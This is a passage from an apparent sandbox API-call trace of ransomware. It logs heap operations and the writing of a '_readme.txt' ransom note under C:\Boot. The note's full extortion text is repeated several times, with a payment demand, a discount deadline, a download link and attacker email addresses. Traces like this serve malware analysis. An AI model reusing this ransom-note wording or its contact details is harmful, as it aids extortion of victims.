lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x32cf950 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.098] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.098] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.099] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.099] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.100] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.100] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.101] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0094.101] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.101] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.101] PathFindFileNameW (pszPath="") returned="" [0094.101] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.102] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.102] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.102] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.102] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0094.102] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.102] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0094.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.103] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.103] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.103] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.103] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.104] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.104] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.105] CloseHandle (hObject=0x5c8) returned 1 [0094.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.105] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.106] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.106] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.106] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.107] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.108] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.108] PathFindFileNameW (pszPath="C:\\Boot\\pt-BR\\") returned="pt-BR\\" [0094.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.109] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.109] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.109] PathFindFileNameW (pszPath="") returned="" [0094.109] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.109] LoadLibraryW 